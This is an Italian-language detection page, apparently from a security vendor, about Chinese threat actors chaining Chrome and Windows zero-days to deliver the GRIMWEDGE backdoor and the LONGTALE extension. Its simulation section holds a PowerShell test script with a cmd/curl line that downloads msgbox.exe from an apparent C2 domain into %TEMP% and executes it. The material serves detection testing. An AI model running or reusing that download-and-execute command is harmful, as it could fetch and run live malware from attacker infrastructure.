Attori di Minaccia Cinesi Concatenano Zero-Day di Browser e Windows
Detection stack
- AIDR
- Alert
- ETL
- Query
Riassunto
Due attori di minacce cinesi, UTA0560 e JungleBamboo, stanno utilizzando una sofisticata catena di exploit a più fasi che prende di mira Google Chrome e il kernel di Windows. Gli attacchi sfruttano una finestra di patch-gap in cui le vulnerabilità vengono risolte in Chromium prima che gli aggiornamenti corrispondenti raggiungano le versioni rilasciate di Google Chrome. Le esche di spear-phishing consegnano diversi payload, inclusi il backdoor JScript GRIMWEDGE e l’estensione Chrome LONGTALE.
Indagine
Il Network Security Monitoring di Volexity ha identificato una campagna di spear-phishing che prende di mira le ONG il 1 settembre 2026. L’indagine ha scoperto una catena di exploit condivisa che coinvolge CVE-2026-85046, CVE-2026-87491 e CVE-2026-85880. Gli analisti hanno separato l’attività in due cluster: UTA0560 che distribuisce GRIMWEDGE e JungleBamboo che utilizza SUPERSTOMP per installare l’estensione LONGTALE.
Mitigazione
Le organizzazioni dovrebbero mantenere Google Chrome aggiornato alla versione più recente disponibile per ridurre l’esposizione durante i periodi di patch-gap. I team di sicurezza dovrebbero monitorare comportamenti insoliti dei processi figlio di Chrome e installazioni non autorizzate di estensioni di Chrome. Si raccomanda anche un forte filtraggio delle email per le esche di spear-phishing e il monitoraggio per la creazione di compiti pianificati sospetti o non autorizzati.
Risposta
Se viene rilevata un’esploitazione, gli host interessati dovrebbero essere isolati immediatamente per prevenire ulteriori comunicazioni command-and-control o movimenti laterali. I risponditori dovrebbero effettuare la forensica della memoria sui processi di Chrome per identificare il codice iniettato. Le estensioni di Chrome installate dovrebbero essere anche verificate, e i compiti pianificati esaminati per voci sospette come Sistema di pianificazione di Windows.
Flusso d’attacco
Stiamo ancora aggiornando questa parte.
Rilevamenti
Uso sospetto di CURL (tramite cmdline)
Command and Control sospetti tramite richiesta DNS di dominio di primo livello (TLD) insolito (via dns)
Compito pianificato sospetto (tramite audit)
IOC (HashSha256) per rilevare: Attenti al (Patch) Gap: Molteplici attori di minacce cinesi concatenano exploit 0-day in Chrome & Windows
IOC (SourceIP) per rilevare: Attenti al (Patch) Gap: Molteplici attori di minacce cinesi concatenano exploit 0-day in Chrome & Windows
IOC (DestinationIP) per rilevare: Attenti al (Patch) Gap: Molteplici attori di minacce cinesi concatenano exploit 0-day in Chrome & Windows
Pagine di atterraggio della catena di exploit di giorno zero di Chrome [Server web]
Rilevamento del backdoor JScript GRIMWEDGE e dell’attività di consegna del payload [Creazione processi di Windows]
Esecuzione della simulazione
-
Narrativa dell’attacco & Comandi: L’avversario cerca di stabilire un punto d’appoggio sul sistema compromesso distribuendo il backdoor JScript GRIMWEDGE. Per evitare il rilevamento da parte dell’AV basato su firme semplici, l’attaccante utilizza
cmd.exee l’utility nativacurlper scaricare un loader di seconda fase chiamatomsgbox.exeda un’infrastruttura di command-and-control (C2) remota. Una volta completato il download, l’attaccante esegue immediatamente il payload dalla directory%TEMP%per minimizzare il tempo che il file trascorre sul disco e per utilizzare una directory spesso trascurata dal monitoraggio di base. Questa sequenza è progettata per corrispondere al pattern specifico della linea di comando che la regola di rilevamento sta cercando. -
Script di test di regressione:
# Script di simulazione per attivare la regola di rilevamento GRIMWEDGE. # Questo script crea un file fittizio per simulare il payload scaricato. $tempDir = $env:TEMP $payloadName = "msgbox.exe" $payloadPath = Join-Path $tempDir $payloadName # 1. Crea un 'msgbox.exe' fittizio per simulare il payload scaricato # In un attacco reale, questo sarebbe il vero binario malevolo. New-Item -Path $payloadPath -ItemType File -Force Set-Content -Path $payloadPath -Value "Contenuto del Payload Fittizio" # 2. Esegui la stringa di comando esatta identificata nella logica di rilevamento. # Nota: Usiamo un approccio locale di echo/mock per l'URL per garantire che la stringa di comando corrisponda esattamente. cmd.exe /c "curl -f -sS -o ""$tempDirmsgbox.exe"" ""https://cloud.shinewrist.net/test/msgbox.exe"" && ""$tempDirmsgbox.exe""" Write-Host "Simulazione completata. Controllare SIEM per avvisi che corrispondono al pattern GRIMWEDGE." -
Comandi per la pulizia:
# Script di pulizia per rimuovere il payload simulato e i file. $tempDir = $env:TEMP $payloadPath = Join-Path $tempDir "msgbox.exe" if (Test-Path $payloadPath) { Remove-Item -Path $payloadPath -Force Write-Host "Pulizia riuscita: $payloadPath rimosso." } else { Write-Host "Payload non trovato. Pulizia non necessaria." }